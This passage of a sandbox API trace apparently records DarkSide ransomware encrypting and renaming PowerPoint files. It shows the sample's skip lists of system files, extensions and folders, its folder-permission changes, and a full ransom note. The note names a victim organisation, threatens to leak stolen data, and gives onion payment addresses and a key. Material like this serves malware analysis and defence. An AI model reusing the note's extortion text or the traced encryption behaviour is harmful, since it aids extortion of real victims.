HALPmcxz\\Documents\\NS-PI08cl E0CZ0AD.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ns-pi08cl e0cz0ad.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64c [0149.024] SetFilePointerEx (in: hFile=0x64c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.024] ReadFile (in: hFile=0x64c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.025] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x3c77f6de [0149.025] RtlComputeCrc32 (PartialCrc=0xf6de, Buffer=0x3feb74, Length=0x80) returned 0x5e0d3e88 [0149.025] RtlComputeCrc32 (PartialCrc=0x3e88, Buffer=0x3feb74, Length=0x80) returned 0xb355bad8 [0149.025] RtlComputeCrc32 (PartialCrc=0xbad8, Buffer=0x3feb74, Length=0x80) returned 0x5af5eb7 [0149.025] RtlComputeCrc32 (PartialCrc=0x5eb7, Buffer=0x3feb74, Length=0x80) returned 0x47a1b80e [0149.026] CloseHandle (hObject=0x64c) returned 1 [0149.026] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.026] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NS-PI08cl E0CZ0AD.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NS-PI08cl E0CZ0AD.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NS-PI08cl E0CZ0AD.pptx" [0149.026] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NS-PI08cl E0CZ0AD.pptx") returned 0x42 [0149.026] wcscpy (in: _Dest=0x44e0104, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.026] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NS-PI08cl E0CZ0AD.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ns-pi08cl e0cz0ad.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NS-PI08cl E0CZ0AD.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ns-pi08cl e0cz0ad.pptx.c06622a1"), dwFlags=0x8) returned 1 [0149.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NS-PI08cl E0CZ0AD.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ns-pi08cl e0cz0ad.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x630 [0149.036] CreateIoCompletionPort (FileHandle=0x630, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.036] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0149.043] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2be5cf79 [0149.043] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa4725d [0149.043] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6ab741b7 [0149.043] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x370a8b73 [0149.043] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x68a55d0a [0149.043] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64415e90 [0149.043] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5207bd40 [0149.043] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50ed9b9f [0149.046] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0xabf97398 [0149.046] RtlComputeCrc32 (PartialCrc=0x7398, Buffer=0x41f0094, Length=0x80) returned 0xafb9c0a3 [0149.046] RtlComputeCrc32 (PartialCrc=0xc0a3, Buffer=0x41f0094, Length=0x80) returned 0x56dd07f2 [0149.046] RtlComputeCrc32 (PartialCrc=0x7f2, Buffer=0x41f0094, Length=0x80) returned 0xc4ee554b [0149.046] RtlComputeCrc32 (PartialCrc=0x554b, Buffer=0x41f0094, Length=0x80) returned 0xae1982a4 [0149.046] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0149.046] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.047] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.047] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3651a130, ftCreationTime.dwHighDateTime=0x1d5cc35, ftLastAccessTime.dwLowDateTime=0x852bd500, ftLastAccessTime.dwHighDateTime=0x1d571d6, ftLastWriteTime.dwLowDateTime=0x852bd500, ftLastWriteTime.dwHighDateTime=0x1d571d6, nFileSizeHigh=0x0, nFileSizeLow=0x14335, dwReserved0=0x0, dwReserved1=0x0, cFileName="NvDcEOSMUqTbVV8n4.pptx", cAlternateFileName="NVDCEO~1.PPT")) returned 1 [0149.047] _wcsicmp (_Str1="NvDcEOSMUqTbVV8n4.pptx", _Str2="README.c06622a1.TXT") returned -4 [0149.047] wcsstr (_Str="NvDcEOSMUqTbVV8n4.pptx", _SubStr="README") returned 0x0 [0149.047] _wcsicmp (_Str1="autorun.inf", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned -13 [0149.047] wcslen (_String="autorun.inf") returned 0xb [0149.048] _wcsicmp (_Str1="boot.ini", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned -12 [0149.048] wcslen (_String="boot.ini") returned 0x8 [0149.048] _wcsicmp (_Str1="bootfont.bin", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned -12 [0149.048] wcslen (_String="bootfont.bin") returned 0xc [0149.048] _wcsicmp (_Str1="bootsect.bak", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned -12 [0149.048] wcslen (_String="bootsect.bak") returned 0xc [0149.048] _wcsicmp (_Str1="desktop.ini", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned -10 [0149.048] wcslen (_String="desktop.ini") returned 0xb [0149.048] _wcsicmp (_Str1="iconcache.db", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned -5 [0149.048] wcslen (_String="iconcache.db") returned 0xc [0149.048] _wcsicmp (_Str1="ntldr", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned -2 [0149.048] wcslen (_String="ntldr") returned 0x5 [0149.048] _wcsicmp (_Str1="ntuser.dat", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned -2 [0149.048] wcslen (_String="ntuser.dat") returned 0xa [0149.048] _wcsicmp (_Str1="ntuser.dat.log", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned -2 [0149.048] wcslen (_String="ntuser.dat.log") returned 0xe [0149.048] _wcsicmp (_Str1="ntuser.ini", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned -2 [0149.048] wcslen (_String="ntuser.ini") returned 0xa [0149.048] _wcsicmp (_Str1="thumbs.db", _Str2="NvDcEOSMUqTbVV8n4.pptx") returned 6 [0149.048] wcslen (_String="thumbs.db") returned 0x9 [0149.048] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0149.048] wcslen (_String="386") returned 0x3 [0149.048] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0149.048] wcslen (_String="adv") returned 0x3 [0149.048] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0149.048] wcslen (_String="ani") returned 0x3 [0149.049] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0149.049] wcslen (_String="bat") returned 0x3 [0149.049] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0149.049] wcslen (_String="bin") returned 0x3 [0149.049] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0149.049] wcslen (_String="cab") returned 0x3 [0149.049] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0149.049] wcslen (_String="cmd") returned 0x3 [0149.049] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0149.049] wcslen (_String="com") returned 0x3 [0149.049] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0149.049] wcslen (_String="cpl") returned 0x3 [0149.049] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0149.049] wcslen (_String="cur") returned 0x3 [0149.049] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0149.049] wcslen (_String="deskthemepack") returned 0xd [0149.049] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0149.049] wcslen (_String="diagcab") returned 0x7 [0149.049] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0149.049] wcslen (_String="diagcfg") returned 0x7 [0149.049] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0149.049] wcslen (_String="diagpkg") returned 0x7 [0149.049] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0149.049] wcslen (_String="dll") returned 0x3 [0149.049] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0149.049] wcslen (_String="drv") returned 0x3 [0149.049] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0149.050] wcslen (_String="exe") returned 0x3 [0149.050] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0149.050] wcslen (_String="hlp") returned 0x3 [0149.050] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0149.050] wcslen (_String="icl") returned 0x3 [0149.050] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0149.050] wcslen (_String="icns") returned 0x4 [0149.050] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0149.050] wcslen (_String="ico") returned 0x3 [0149.050] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0149.050] wcslen (_String="ics") returned 0x3 [0149.050] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0149.050] wcslen (_String="idx") returned 0x3 [0149.050] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0149.050] wcslen (_String="ldf") returned 0x3 [0149.050] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0149.050] wcslen (_String="lnk") returned 0x3 [0149.050] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0149.050] wcslen (_String="mod") returned 0x3 [0149.050] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0149.050] wcslen (_String="mpa") returned 0x3 [0149.050] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0149.050] wcslen (_String="msc") returned 0x3 [0149.050] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0149.050] wcslen (_String="msp") returned 0x3 [0149.050] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0149.050] wcslen (_String="msstyles") returned 0x8 [0149.051] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0149.051] wcslen (_String="msu") returned 0x3 [0149.051] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0149.051] wcslen (_String="nls") returned 0x3 [0149.051] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0149.051] wcslen (_String="nomedia") returned 0x7 [0149.051] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0149.051] wcslen (_String="ocx") returned 0x3 [0149.051] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0149.051] wcslen (_String="prf") returned 0x3 [0149.051] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0149.051] wcslen (_String="ps1") returned 0x3 [0149.051] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0149.051] wcslen (_String="rom") returned 0x3 [0149.051] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0149.051] wcslen (_String="rtp") returned 0x3 [0149.051] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0149.051] wcslen (_String="scr") returned 0x3 [0149.051] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0149.051] wcslen (_String="shs") returned 0x3 [0149.051] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0149.051] wcslen (_String="spl") returned 0x3 [0149.051] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0149.051] wcslen (_String="sys") returned 0x3 [0149.051] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0149.051] wcslen (_String="theme") returned 0x5 [0149.051] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0149.051] wcslen (_String="themepack") returned 0x9 [0149.052] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0149.052] wcslen (_String="wpx") returned 0x3 [0149.052] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0149.052] wcslen (_String="lock") returned 0x4 [0149.052] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0149.052] wcslen (_String="key") returned 0x3 [0149.052] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0149.052] wcslen (_String="hta") returned 0x3 [0149.052] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0149.052] wcslen (_String="msi") returned 0x3 [0149.052] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0149.052] wcslen (_String="pdb") returned 0x3 [0149.052] _wcsicmp (_Str1="sql", _Str2="pptx") returned 3 [0149.052] wcslen (_String="sql") returned 0x3 [0149.052] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0149.052] wcslen (_String="sqlite") returned 0x6 [0149.052] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0149.073] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.073] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0149.073] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0149.073] wcscpy (in: _Dest=0x44d00d0, _Source="NvDcEOSMUqTbVV8n4.pptx" | out: _Dest="NvDcEOSMUqTbVV8n4.pptx") returned="NvDcEOSMUqTbVV8n4.pptx" [0149.073] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NvDcEOSMUqTbVV8n4.pptx", dwFileAttributes=0x80) returned 1 [0149.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NvDcEOSMUqTbVV8n4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvdceosmuqtbvv8n4.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0149.073] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.073] ReadFile (in: hFile=0x630, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.074] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xb747129d [0149.074] RtlComputeCrc32 (PartialCrc=0x129d, Buffer=0x3feb74, Length=0x80) returned 0xe9a9c754 [0149.074] RtlComputeCrc32 (PartialCrc=0xc754, Buffer=0x3feb74, Length=0x80) returned 0x18074d42 [0149.074] RtlComputeCrc32 (PartialCrc=0x4d42, Buffer=0x3feb74, Length=0x80) returned 0x812f5b7f [0149.074] RtlComputeCrc32 (PartialCrc=0x5b7f, Buffer=0x3feb74, Length=0x80) returned 0xfc41af07 [0149.074] CloseHandle (hObject=0x630) returned 1 [0149.074] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.074] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NvDcEOSMUqTbVV8n4.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NvDcEOSMUqTbVV8n4.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NvDcEOSMUqTbVV8n4.pptx" [0149.074] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NvDcEOSMUqTbVV8n4.pptx") returned 0x42 [0149.074] wcscpy (in: _Dest=0x44e0104, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.075] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NvDcEOSMUqTbVV8n4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvdceosmuqtbvv8n4.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NvDcEOSMUqTbVV8n4.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvdceosmuqtbvv8n4.pptx.c06622a1"), dwFlags=0x8) returned 1 [0149.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NvDcEOSMUqTbVV8n4.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvdceosmuqtbvv8n4.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x630 [0149.077] CreateIoCompletionPort (FileHandle=0x630, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.077] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0149.082] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x245f7501 [0149.082] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x79c14fb9 [0149.082] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4fcd410e [0149.082] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5404a470 [0149.083] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29fff992 [0149.083] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5c4ca23c [0149.083] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x15e97c5f [0149.083] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78fdd0fe [0149.086] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x89db1454 [0149.086] RtlComputeCrc32 (PartialCrc=0x1454, Buffer=0x2f30094, Length=0x80) returned 0x5b61af3 [0149.086] RtlComputeCrc32 (PartialCrc=0x1af3, Buffer=0x2f30094, Length=0x80) returned 0x1ded7ea4 [0149.086] RtlComputeCrc32 (PartialCrc=0x7ea4, Buffer=0x2f30094, Length=0x80) returned 0x2b6ba029 [0149.086] RtlComputeCrc32 (PartialCrc=0xa029, Buffer=0x2f30094, Length=0x80) returned 0xfae756ca [0149.086] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0149.086] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.087] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.087] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd8ec990, ftCreationTime.dwHighDateTime=0x1d5dffb, ftLastAccessTime.dwLowDateTime=0x72240ec0, ftLastAccessTime.dwHighDateTime=0x1d5d9a3, ftLastWriteTime.dwLowDateTime=0x72240ec0, ftLastWriteTime.dwHighDateTime=0x1d5d9a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oHjAL", cAlternateFileName="")) returned 1 [0149.087] _wcsicmp (_Str1="$recycle.bin", _Str2="oHjAL") returned -75 [0149.087] wcslen (_String="$recycle.bin") returned 0xc [0149.087] _wcsicmp (_Str1="config.msi", _Str2="oHjAL") returned -12 [0149.087] wcslen (_String="config.msi") returned 0xa [0149.087] _wcsicmp (_Str1="$windows.~bt", _Str2="oHjAL") returned -75 [0149.087] wcslen (_String="$windows.~bt") returned 0xc [0149.087] _wcsicmp (_Str1="$windows.~ws", _Str2="oHjAL") returned -75 [0149.087] wcslen (_String="$windows.~ws") returned 0xc [0149.087] _wcsicmp (_Str1="windows", _Str2="oHjAL") returned 8 [0149.087] wcslen (_String="windows") returned 0x7 [0149.087] _wcsicmp (_Str1="appdata", _Str2="oHjAL") returned -14 [0149.087] wcslen (_String="appdata") returned 0x7 [0149.087] _wcsicmp (_Str1="application data", _Str2="oHjAL") returned -14 [0149.088] wcslen (_String="application data") returned 0x10 [0149.088] _wcsicmp (_Str1="boot", _Str2="oHjAL") returned -13 [0149.088] wcslen (_String="boot") returned 0x4 [0149.088] _wcsicmp (_Str1="google", _Str2="oHjAL") returned -8 [0149.088] wcslen (_String="google") returned 0x6 [0149.088] _wcsicmp (_Str1="mozilla", _Str2="oHjAL") returned -2 [0149.088] wcslen (_String="mozilla") returned 0x7 [0149.088] _wcsicmp (_Str1="program files", _Str2="oHjAL") returned 1 [0149.088] wcslen (_String="program files") returned 0xd [0149.088] _wcsicmp (_Str1="program files (x86)", _Str2="oHjAL") returned 1 [0149.088] wcslen (_String="program files (x86)") returned 0x13 [0149.088] _wcsicmp (_Str1="programdata", _Str2="oHjAL") returned 1 [0149.088] wcslen (_String="programdata") returned 0xb [0149.088] _wcsicmp (_Str1="system volume information", _Str2="oHjAL") returned 4 [0149.088] wcslen (_String="system volume information") returned 0x19 [0149.088] _wcsicmp (_Str1="tor browser", _Str2="oHjAL") returned 5 [0149.088] wcslen (_String="tor browser") returned 0xb [0149.088] _wcsicmp (_Str1="windows.old", _Str2="oHjAL") returned 8 [0149.088] wcslen (_String="windows.old") returned 0xb [0149.088] _wcsicmp (_Str1="intel", _Str2="oHjAL") returned -6 [0149.088] wcslen (_String="intel") returned 0x5 [0149.089] _wcsicmp (_Str1="msocache", _Str2="oHjAL") returned -2 [0149.089] wcslen (_String="msocache") returned 0x8 [0149.089] _wcsicmp (_Str1="perflogs", _Str2="oHjAL") returned 1 [0149.089] wcslen (_String="perflogs") returned 0x8 [0149.089] _wcsicmp (_Str1="x64dbg", _Str2="oHjAL") returned 9 [0149.089] wcslen (_String="x64dbg") returned 0x6 [0149.089] _wcsicmp (_Str1="public", _Str2="oHjAL") returned 1 [0149.089] wcslen (_String="public") returned 0x6 [0149.089] _wcsicmp (_Str1="all users", _Str2="oHjAL") returned -14 [0149.089] wcslen (_String="all users") returned 0x9 [0149.089] _wcsicmp (_Str1="default", _Str2="oHjAL") returned -11 [0149.089] wcslen (_String="default") returned 0x7 [0149.089] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" [0149.089] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 0x2d [0149.089] wcscpy (in: _Dest=0x44b00c0, _Source="oHjAL" | out: _Dest="oHjAL") returned="oHjAL" [0149.089] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.089] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.090] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" [0149.090] GetNamedSecurityInfoW () returned 0x0 [0149.090] SetEntriesInAclW () returned 0x0 [0149.090] SetNamedSecurityInfoW () returned 0x0 [0149.115] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d575b8) returned 1 [0149.115] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.115] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal")) returned 1 [0149.115] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0149.115] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\readme.c06622a1.txt"), 